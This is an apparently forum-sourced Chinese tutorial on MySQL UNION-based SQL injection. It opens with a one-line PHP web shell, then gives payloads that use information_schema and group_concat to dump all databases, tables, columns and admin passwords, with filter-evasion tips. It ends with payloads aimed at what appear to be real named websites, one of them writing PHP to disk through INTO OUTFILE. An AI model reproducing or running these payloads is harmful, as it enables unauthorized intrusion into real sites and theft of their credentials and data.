
<?include($_GET["cmd"]);?>

此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
但此方法大大提高了读取数据库的速度,此方法并非本人原创，原创出处是国外某牛人


优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入

缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...

下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
在注入时根据实际情况作出变化 比如过滤了空格，使用/**/ ,  + 等等

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17

读出所有库:
http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA



读出所有表:
http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()

读出所有表字段:
http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
*/ (97,100,109,105,110)为admin的ascii码 依次类推

读出所有表字段里的内容:
http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin

http://www.melbournefestival.com.au/program/2009?id=-3181+UNION+SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,0x3C3F70687020706870696E666F28293B3F3E,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+mysql.user+into+outfile%27/tmp/b1.txt%27--


http://www.eset.com.tw/default.php?id=393&p=20&action=detail&pid=-1+UNION+SELECT+1,2,3,4,5,6,group_concat(0x3C62723E,table_schema,0x7c,table_name,0x7c,column_name)+from+information_schema.columns+where+column_name+like+'%25pass%25'



http://hhjjw.hongheiwang.com/brandInfo.php?brand_id=57%20and%201=2%20union%20select%201,2,group_concat(0x3C62723E,table_schema,0x7c,table_name,0x7c,column_name),4,5,6,7,8,9%20from%20information_schema.columns%20where%20instr(column_name,0x75736572)%3E0%23



http://www.dsblog.net/detail3.php
?id=-5586 UNION SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,group_concat(0x3C62723E,table_schema,0x7c,table_name,0x7c,column_name),7,8,9,10,11,12,13,14,15 +from%20information_schema.columns%20where%20instr(column_name,0x70617373)%3E0%23